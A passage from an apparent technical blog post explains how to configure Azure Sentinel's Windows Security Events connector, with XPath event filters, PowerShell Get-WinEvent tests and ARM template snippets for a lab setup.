data-contrast="auto">&nbsp;resource&nbsp;to set the collection tier of&nbsp;Windows&nbsp;security events.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_1-1624563350661.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291050i6B0B34224AC3FD06/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_1-1624563350661.png" alt="Cyb3rWard0g_1-1624563350661.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="none">The&nbsp;</SPAN><STRONG><SPAN data-contrast="none">new&nbsp;connector</SPAN></STRONG><SPAN data-contrast="none">, on the other hand, uses a combination of&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Connection Rules&nbsp;(DCR)</SPAN></A><SPAN data-contrast="none">&nbsp;and&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Connector Rules&nbsp;Association&nbsp;(DCRA)</SPAN></A><SPAN data-contrast="none">. DCRs&nbsp;define&nbsp;what data to collect and where it should be sent.&nbsp;Here is where we can set it to send data to the log analytics workspace backing up our&nbsp;</SPAN><STRONG><SPAN data-contrast="none">Azure Sentinel</SPAN></STRONG><SPAN data-contrast="none">&nbsp;instance.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_2-1624563350663.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291051iF978EEBE3595B7DC/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_2-1624563350663.png" alt="Cyb3rWard0g_2-1624563350663.png" /></span></P> <P>&nbsp;</P> <P><SPAN>&nbsp;</SPAN><SPAN><BR /></SPAN><SPAN data-contrast="none">In order to apply a DCR to a virtual machine, one needs to create an association&nbsp;between the machine and the rule.&nbsp;A virtual machine may have an association&nbsp;with&nbsp;multiple DCRs, and a DCR may have multiple virtual machines associated&nbsp;with&nbsp;it.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_3-1624563350658.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291053i9B3AE8FBDE7E1789/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_3-1624563350658.png" alt="Cyb3rWard0g_3-1624563350658.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">For more&nbsp;detailed&nbsp;information about setting up the Windows Security Events connector with both Log Analytics Agent and Azure Monitor Agents <STRONG>manually</STRONG>, take a look at&nbsp;&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">this document</SPAN></A><SPAN data-contrast="auto">.</SPAN><SPAN><BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H3><SPAN data-contrast="none">Data Collection&nbsp;Filtering Capabilities</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">The&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">old connector</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;is not flexible enough to choose&nbsp;what&nbsp;specific events to collect. For example, these are the only options to collect data from Windows machines with the old connector:</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="41" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><STRONG><SPAN data-contrast="auto">All events</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;- All Windows security and AppLocker events.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="41" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Common</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;- A standard set of events for auditing purposes.&nbsp;The Common event set may contain some types of events that aren't so common. This is because the main point of the Common set is to reduce the volume of events to a more manageable level, while still maintaining full audit trail capability.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="41" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Minimal</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;- A small set of events that might indicate potential threats. This set does not contain a full audit trail. It covers only events that might indicate a successful breach, and other important events that have very low rates of occurrence.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="41" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><STRONG><SPAN data-contrast="auto">None</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;- No security or AppLocker events. (This setting is used to disable the connector.)</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="auto">According to&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Microsoft docs</SPAN></A><SPAN data-contrast="auto">, these are the&nbsp;pre-defined&nbsp;security&nbsp;event&nbsp;collection&nbsp;groups depending on the tier set:</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_4-1624563350652.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291052iC2BEBDCEB748311A/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_4-1624563350652.png" alt="Cyb3rWard0g_4-1624563350652.png" /></span></P> <P><SPAN>&nbsp;</SPAN><SPAN><BR /></SPAN><SPAN data-contrast="auto">On the other hand, the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">new connector</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;allows custom&nbsp;data collection&nbsp;via <STRONG>XPath queries</STRONG>.&nbsp;These <STRONG>XPath queries</STRONG> are defined during the creation of the data collection rule&nbsp;and are&nbsp;written in the form&nbsp;of&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">LogName!XPathQuery</SPAN></STRONG><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;Here are a few examples:</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="39" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Collect only Security events with Event ID = 4624</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <PRE><SPAN data-contrast="auto">Security!*[System[(EventID=4624)]]</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="39" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Collect only Security events with Event ID = 4624 or Security Events with Event ID = 4688</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <PRE><SPAN data-contrast="auto">Security!*[System[(EventID=4624 or&nbsp;EventID=4688)]]</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="37" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Collect only Security events with Event ID = 4688 and with a process name of&nbsp;consent.exe.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <PRE><SPAN data-contrast="auto">Security!*[System[(EventID=4688)]] and&nbsp;*[EventData[Data[@Name=’ProcessName’]=’C:\Windows\System32\consent.exe’]]</SPAN><SPAN><BR /></SPAN></PRE> <P>&nbsp;</P> <P>You can select the <STRONG>custom</STRONG> option to select which events to stream:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_5-1624563350659.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291054i880C763609ED9DF3/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_5-1624563350659.png" alt="Cyb3rWard0g_5-1624563350659.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none">Important!</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Based on&nbsp;the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">new&nbsp;connector&nbsp;docs</SPAN></A><SPAN data-contrast="auto">, make sure to query only Windows Security and AppLocker logs. Events from other Windows logs, or from security logs from other environments, may not adhere to the Windows Security Events schema and&nbsp;won’t&nbsp;be parsed properly, in which case they won’t be ingested to your workspace.</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Also,&nbsp;the Azure Monitor agent supports XPath queries for XPath version 1.0 only. I recommend reading the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Xpath 1.0 Limitation documentation</SPAN></A><SPAN data-contrast="auto">&nbsp;before writing XPath Queries.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><SPAN data-contrast="none">XPath?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">XPath stands for XML&nbsp;(Extensible Markup&nbsp;Language)&nbsp;Path&nbsp;language,&nbsp;and&nbsp;it&nbsp;is used to explore and model XML documents as a tree of nodes. Nodes&nbsp;can be represented as <STRONG>elements</STRONG>, <STRONG>attributes</STRONG>,&nbsp;and <STRONG>text</STRONG>.&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">In the image below, we can see a few node examples in&nbsp;the&nbsp;XML representation of a Windows security&nbsp;event:</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_6-1624563350669.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291057iA84CA44228260CCC/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_6-1624563350669.png" alt="Cyb3rWard0g_6-1624563350669.png" /></span></P> <P>&nbsp;</P> <H2><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">XPath Queries?</SPAN><SPAN>&nbsp;<BR /></SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">XPath queries are used to search for&nbsp;patterns&nbsp;in&nbsp;XML documents and&nbsp;leverage&nbsp;path expressions and&nbsp;predicates to&nbsp;find a node or filter&nbsp;specific nodes&nbsp;that contain a specific value.&nbsp;Wildcards such as ‘<STRONG>*</STRONG>’ and ‘<STRONG>@</STRONG>’ are used to select nodes and predicates are always embedded in square brackets&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">“[]”.</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P aria-level="2">&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none">Matching&nbsp;any element node&nbsp;with ‘*’</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Using our&nbsp;previous&nbsp;Windows Security event XML example, we can&nbsp;process Windows Security events&nbsp;using&nbsp;the wildcard ‘<STRONG>*</STRONG>’&nbsp;at the `Element`&nbsp;node&nbsp;level.</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">The&nbsp;example below walks through&nbsp;two&nbsp;‘<STRONG>Element</STRONG>’&nbsp;nodes to get to the&nbsp;‘<STRONG>Text</STRONG>’ node of value&nbsp;‘4688’.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_7-1624563350628.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291056i467F07A87C900F2D/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_7-1624563350628.png" alt="Cyb3rWard0g_7-1624563350628.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">You can test this basic ‘<STRONG>XPath</STRONG>’ query via PowerShell.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="35" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Open a PowerShell console as ‘Administrator’.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="35" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Use the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Get-WinEvent</SPAN></A><SPAN data-contrast="auto">&nbsp;command to pass the XPath query.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="35" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Use the ‘Logname’ parameter to define what event channel to run the query against.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="35" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Use the ‘FilterXPath’ parameter to set the XPath query.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <PRE><SPAN data-contrast="auto">Get-WinEvent&nbsp;-LogName&nbsp;Security -FilterXPath&nbsp;'*[System[EventID=4688]]</SPAN><SPAN><BR /></SPAN></PRE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_8-1624563350630.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291055i55FC76B00062BB27/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_8-1624563350630.png" alt="Cyb3rWard0g_8-1624563350630.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none">Matching&nbsp;any attribute node&nbsp;with ‘@’</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">As shown before, ‘<STRONG>Element</STRONG>’ nodes can contain ‘<STRONG>Attributes</STRONG>’ and we can use the wildcard ‘<STRONG>@</STRONG>’ to&nbsp;search for ‘<STRONG>Text</STRONG>’ nodes at the ‘<STRONG>Attribute</STRONG>’ node level.&nbsp;</SPAN><SPAN data-contrast="auto">The example below extends the previous one and&nbsp;adds a filter to search for&nbsp;a specific ‘<STRONG>Attribute</STRONG>’ node that contains the&nbsp;following text: '<STRONG>C:\Windows\System32\cmd.exe</STRONG>’.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_9-1624563350632.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291058iE40EC29B9B3E793E/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_9-1624563350632.png" alt="Cyb3rWard0g_9-1624563350632.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Once again, you can test the XPath query via PowerShell as Administrator.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <PRE><SPAN data-contrast="auto">$XPathQuery&nbsp;= "*[System[EventID=4688]] and *[EventData[Data[@Name='ParentProcessName']='C:\Windows\System32\cmd.exe']]"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">Get-WinEvent&nbsp;-LogName&nbsp;Security -FilterXPath&nbsp;$XPathQuery</SPAN><SPAN><BR /></SPAN></PRE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_10-1624563350633.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291059i7B045F7777842584/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_10-1624563350633.png" alt="Cyb3rWard0g_10-1624563350633.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2 aria-level="1"><SPAN data-contrast="none">Can I Use XPath Queries in Event Viewer?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Every time you add a filter through the Event Viewer UI, you can also get to the XPath query representation of the filter.&nbsp;The&nbsp;XPath query is part of&nbsp;a&nbsp;<STRONG>QueryList</STRONG>&nbsp;node&nbsp;which allows you to&nbsp;define and run&nbsp;multiple queries&nbsp;at once.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_11-1624563350665.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291060iD5C2AFD5E98C44A2/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_11-1624563350665.png" alt="Cyb3rWard0g_11-1624563350665.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We can take our previous example where we searched for a&nbsp;specific&nbsp;attribute and run it through the Event Viewer Filter XML UI.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN>&nbsp;</SPAN></P> <PRE><SPAN data-contrast="auto">&lt;QueryList&gt;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; &lt;Query Id="0" Path="Security"&gt;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; &lt;Select Path="Security"&gt;*[System[(EventID=4688)]] and *[EventData[Data[@Name='ParentProcessName']='C:\Windows\System32\cmd.exe']]&lt;/Select&gt;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; &lt;/Query&gt;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&lt;/QueryList&gt;</SPAN><SPAN><BR /></SPAN></PRE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_12-1624563350667.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291063iBD3C6F0F0A81E511/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_12-1624563350667.png" alt="Cyb3rWard0g_12-1624563350667.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Now that we have covered some of the main changes and features of the new version of the Windows Security Events data connector, it is time to show you how to create a lab environment for you to test your own XPath queries&nbsp;for research purposes and&nbsp;before&nbsp;pushing them&nbsp;to&nbsp;production.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2 aria-level="1">&nbsp;</H2> <H2 aria-level="1"><SPAN data-contrast="none">Deploy Lab Environment</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"><BR /></SPAN></H2> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="45" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Identify the&nbsp;right Azure&nbsp;resources to&nbsp;deploy.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="45" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Create deployment&nbsp;template.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="45" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Run deployment template.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <H3><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">Identify&nbsp;the Right&nbsp;Azure Resources&nbsp;to&nbsp;Deploy</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">As mentioned&nbsp;earlier in this post,&nbsp;the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">old connector</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;uses&nbsp;the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Sources resource</SPAN></A><SPAN data-contrast="auto">&nbsp;from the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Log Analytics Workspace</SPAN></A><SPAN data-contrast="auto">&nbsp;resource to set the collection tier of Windows security events.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">This is the&nbsp;Azure Resource Manager (ARM)&nbsp;template&nbsp;I use&nbsp;in&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go</SPAN></A><SPAN data-contrast="auto">&nbsp;to set it up:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go/securityEvents.json at master · OTRF/Azure-Sentinel2Go (github.com)</SPAN></A></P> <P>&nbsp;</P> <P><STRONG><SPAN data-contrast="auto">Data Sources Azure Resource</SPAN></STRONG></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="none">{</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "type": "Microsoft.OperationalInsights/workspaces/dataSources",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "apiVersion": "2020-03-01-preview",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "location": "eastus",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "name": "WORKSPACE/SecurityInsightsSecurityEventCollectionConfiguration",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "kind": "SecurityInsightsSecurityEventCollectionConfiguration",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "properties": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; "tier": "All",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; "tierSetMethod": "Custom"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">}</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">However, the&nbsp;</SPAN><STRONG><SPAN data-contrast="none">new connector</SPAN></STRONG><SPAN data-contrast="none">&nbsp;uses a combination of&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Connection Rules (DCR)</SPAN></A><SPAN data-contrast="none">&nbsp;and&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Connector Rules Association (DCRA)</SPAN></A><SPAN data-contrast="none">.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">This is the&nbsp;ARM&nbsp;template&nbsp;I&nbsp;use to create data collection rules:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/creation-azureresource.json at master · OTRF/Azure-Sentinel2Go (github.com)</A>&nbsp;<BR /><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><STRONG><SPAN data-contrast="auto">Data Collection Rules Azure Resource</SPAN></STRONG><SPAN><BR /></SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="none">{</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "type": "microsoft.insights/dataCollectionRules",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN 